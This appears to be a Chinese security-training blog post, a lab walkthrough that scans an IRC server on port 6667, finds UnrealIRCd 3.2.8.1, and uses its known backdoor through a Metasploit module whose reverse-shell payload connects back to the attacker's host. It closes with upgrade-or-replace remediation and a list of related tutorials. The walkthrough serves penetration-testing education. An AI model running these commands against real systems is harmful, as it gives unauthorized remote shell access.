6-25漏洞利用-irc后门利用

最新推荐文章于 2024-04-29 10:13:57 发布
最新推荐文章于 2024-04-29 10:13:57 发布
阅读量902 收藏 6
点赞数
分类专栏: 网络安全训练营 文章标签: 服务器 网络 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53008479/article/details/126101062
版权

在这里插入图片描述

irc介绍

IRC是Internet Relay Chat 的英文缩写,中文一般称为互联网中继聊天。它是由芬兰人Jarkko Oikarinen于1988年首创的一种网络聊天协议。经过十年的发展,目前世界上有超过60个国家提供了IRC的服务,IRC的工作原理非常简单,您只要在自己的PC上运行客户端软件,然后通过因特网以IRC协议连接到一台IRC服务器上即可。这个时候,就可以通过irc聊天,它的特点是速度非常之快,聊天时几乎没有延迟现象,并且只占用很小的带宽资源,使得速度更快。所有用户可以在一个被称为"Channel"(频道)的地方就某一话题进行交谈或密谈。每个IRC的使用者都有一个Nickname(昵称),用来区分不同用户。

默认情况下,irc服务器运行在6667端口。

在这里插入图片描述

探测目标irc

使用nmap -sV -p 6667 IP地址 探测目标irc版本信息

nmap -sV -p 6667 192.168.42.137

在这里插入图片描述

可以看到,很快探测出目标版本信息

msf利用irc后门

使用searchsploit查找可以利用的POC

searchsploit UnrealIRCd

在这里插入图片描述

可以查看到,当前软件是否存在问题,我们在这里选择Backdoor Command Execution(Metasploit),进行利用

use exploit/unix/irc/unreal_ircd_3281_backdoor
show options
set payload cmd/unix/reverse
show options
set lhost 192.168.42.128
exploit

利用msf中对于irc后门连接的模块,连接shell。

在这里插入图片描述

可以看到,探测完成,建立了session,我们可以在这里执行任意命令

修复防御

1、升级软件版本

2、更换其他软件

山兔1
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
irc-butler:我需要的IRC机器人
04-13
安装 安装nvm: brew nvm (或适合您系统的任何文件)。 安装节点: nvm install 6.9.2 (或.nvmrc提到的任何版本) 安装依赖项: npm install --no-optional (npm与节点一起安装)。 --no-optional参数是因为IRC库对运行不良的C库( iconv , node-icu-charset-detector )具有一些可选的依赖关系,这些错误只会带来比其node-icu-charset-detector错误更多的错误。 如果证明有一定用处,则可以考虑阅读它们。 缺点是,您收到有关每个传入消息中都不存在的模块的错误。 可能想编辑node_modules/irc/lib/irc.js那部分,使其停止显示。 注意:此IRC库显然很糟,并且缺少DCC。 它也没有得到维护。 应该考虑使用另一个库或用我需要的扩展这个库。 跑步
msf利用Metasploitable 2 漏洞之6667端口之unreal_ircd_3281_backdoor
crowsec
05-05 5283
Metasploitable漏洞演练系统 是Metasploit团队维护的一个集成了各种漏洞弱点的Linux主机(ubuntu)镜像,这方便大家对于msf的学,以下以6667端口的unreal_ircd_3281_backdoor进行攻击。可以在虚拟机中启动(登录密码和账号都是msfadmin)查看其ip:    ifconfig地址为:192.168.127.145然后在kali linux中进...
010106漏洞利用
TangTang_AM的博客
03-26 4566
6-1漏洞利用-FTP漏洞利用 1. FTP协议介绍 文件传输协议(英文:File Transfer Protocol,缩写:FTP)是用于在网络上进行文件传输的一套标准协议,使用客户/服务器模式。它属于网络传输协议的应用层。FTP使用21号端口。 用户分类: 1、Real用户 2、Administrator 3、匿名用户 FTP文件传输格式 1、ASCII 2、二进制格式 2. 利用FTP匿名登录漏洞 由于FTP没有禁止匿名用户,所以可以直接使用Anonymous用户直接登录FTP服务器...
4.100个渗透测试实战#4(LazySysAdmin)
qwsn
03-24 1930
目录 一、实验环境 二、实验流程 三、实验步骤 (一)信息收集——主机发现 1.查看kali的网卡和IP信息;(网卡名:eht0;IP:192.168.97.129) 2.查看靶机页面; 3.探测特定网络内的,主机存活状态(netdiscover、arp-scan、nmap); 4.分析所得: (二)信息收集——端口(服务)扫描 1.扫描端口,以及端口对应的服务信息,以及靶机的...
靶机渗透(三)——Lazysysadmin
qq_45751902的博客
04-21 3315
环境配置 都是在vmware中 靶机:未知,nat模式 kali:192.168.92.5 nat,模式 信息收集 arp-scan -l 扫描局域网内所有的ip 从上图可知,靶机的ip是192.168.92.6 端口扫描 nmap -sS -Pn -T4 -sV -O 192.168.92.6 或者 masscan 192.168.92.6 -p 0-65535 --rate=10000 masscan扫描速度快,但准确率不高,多扫描几次,防止漏扫 namp:-T4(分为0-5等级;-s
web渗透--irc后门利用
朝阳似锦 晖映山河
09-13 716
irc介绍 IRC是Internet Relay Chat的英文缩写,中文称为互联网中继聊天,是一种网络聊天协议。 端口号默认的是6667号端口 探测irc nmap -sV 目标IP地址 -p 端口号 msf利用irc后门 使用searchsploit查看可以利用的POC msfconsole use exploit/unix/irc/unreal_ircd_3281_backdoor show options set rhosts 目标IP地址 run sessions -l sessions
2021-10-28 漏洞利用与远程控制
夕阳的街道的博客
10-28 658
一、实验题目: 漏洞利用与远程控制 二、实验内容: 1.使用nmap的【-A】参数对metasploitable进行强力扫描 2.使用kali自带的msfconsole进行渗透测试与远程控制 三、环境准备: 1.kali虚拟机(攻击者主机:192.168.112.130) 2.Metasploitable靶机(目标主机:192.168.112.132) 四、实验步骤: 1.使用pin...
网络通信端口选择一定要慎重 -- 可恶的 6667 端口!
nimo10050的博客
03-17 4413
开篇 本文通过一个真实案例,讲明端口选取的重要性!!! 没事别 TM 随意选端口~~~,嫌麻烦可以直接看文末总结! 项目背景 如下图所示,有三个 web 应用互相通过 http 协议进行通信。 项目基于 python 的 flask web 框架开发,http 接口请求用的第三方的 requests 模块。 测试环境如下: Server 1 【172.16.10.128】 app1 - ...
Metasploitable2靶机渗透
weixin_51167520的博客
03-13 1676
Metasploitable2靶机渗透 实验环境:KALI Metasploitable2 Metasploitable2介绍 Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用的安全漏洞。这个版本的虚拟系统兼容VMware,VirtualBox,和其他虚拟平台。默认只开启一个网络适配器并且开启NAT和Host-only,本镜像一定不要暴漏在一个易受攻击的网络中。 进行此次靶机练
IRC-Bot-Hunters:我为IRC僵尸网络编写的Metasploit PoC漏洞收集,允许RCE
05-24
IRC机器人猎人 我为IRC僵尸网络编写的Metasploit PoC攻击集合,该僵尸网络接管了僵尸程序的所有者,然后该僵尸程序允许远程执行代码。 大多数IRC僵尸网络可以通过使用其牧民的用户名或触发执行外壳程序执行的特定命令来接管。 Metasploit存储库中已接受此处的几乎所有模块。 如果您正在寻找C&C漏洞利用模块或使用后盖,例如r57 / c99 shell,我还制作了,已推送到主msf存储库中。 接受的Metasploit模块 w3tw0rk / Pitbul IRC bot的远程执行代码- Legend Perl IRC Bot远程执行代码-https: XDH / LinuxNet Perlbot / fBot IRC bot的远程执行代码- PHP IRC机器人PBOT的eval()远程执行代码(仅贷记) - 一些参考 w3tw0rk /斗犬的Perl IR
revolution-irc:现代的Android IRC客户端。 #revolutionirc在Freenode上
05-12
革命IRC Revolution IRC客户端是专为设计和功能而设计的适用于Android的下一代IRC客户端。 让我们开始这场革命! 该客户具有现代的Material设计以及许多其他令人敬畏的功能: 即使在较新的Android版本上也可以正确...
irc-defs:更多最新的IRC定义列表
04-30
IRC定义列表 这些是IRC定义列表。 诸如IRC数字列表,通道模式,用户模式之类的内容以及在IRC软件的各个位中实现的其他内容。 基本数据来自 ,并通过_legacy_data/文件夹中的工具转换为YAML,并适用于静态站点生成器...
Obj-IRC-Lib:与 IRC 服务器交互的 Objective-C 库
06-18
Obj-IRC –– 主库 IRC 协议实现,在(几乎)纯 Objective-C 中。 由和 一些警告词 在你开始将这个库转储到你的代码中之前,请意识到这纯粹是我和我的一个朋友一起创造的一个实验性的东西。 所以期待错误和随机错误...
awesome-irc:精选的IRC精选资源列表
01-31
awesome-irc:精选的IRC精选资源列表
WinForms 应用程序中使用 SignalR 连接到服务器
最新发布
一个专注于技术研究创新的程序员
04-29 294
假设您已经在服务器端实现了名为 SignalRHub 的 SignalR Hub,并且该 Hub 包含了一个名为 SendMessage 的方法,用于接收来自客户端的消息,并将其广播给所有连接的客户端。客户端在收到消息时调用名为 ReceiveMessage 的方法来处理。
3节点ubuntu24.04服务器docker-compose方式部署高可用elk+kafka日志系统并接入nginx日志
qq_41905051的博客
04-23 1177
3节点ubuntu24.04服务器docker-compose方式部署高可用elk+kafka日志系统并接入nginx日志
【勒索病毒恢复】.svh勒索病毒介绍及恢复方案
safe130的博客
04-23 803
halo,.360,.faust,.eking,.wis,.mkp,.malox,.rmallox,.mallox,ma1x0,.live,.carver,.locked,_locked,.locked1,.svh , lockbit, .datah等等,请注意,恢复被勒索病毒加密的数据并非总是成功,且过程中可能存在数据丢失或损坏的风险。为了防范svh勒索病毒的感染,用户应该保持警惕,不轻易打开未知来源的邮件附件或点击不明链接,同时定期更新和修补电脑上的软件漏洞,使用强密码,并启用防火墙等安全防护措施。
【Linux】文件目录及路径表示
m0_54666135的博客
04-23 446
在 Linux 系统中,有几个目录是比较重要的,平时需要注意不要误删除或者随意更改内部文件。 /etc: 这个是系统中的配置文件,如果更改了该目录下的某个文件可能会导致系统不能启动。 /bin, /sbin, /usr/bin, /usr/sbin: 这是系统预设的执行文件的放置目录,比如 ls 就是在 /bin/ls 目录下的。 值得提出的是 /bin、/usr/bin 是给系统用户使用的指令(除 root 外的通用用户),而/sbin, /usr/sbin 则是给 root 使用的指令。
应用手册 - 控制器软件irc5
07-27
这本手册详细介绍了irc5的功能和操作步骤,旨在帮助用户充分利用控制器软件的各种功能,提高生产效率和质量。 手册的内容主要包括以下几个方面: 首先,手册介绍了irc5的基本概念和理论知识,包括机器人工作原理、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值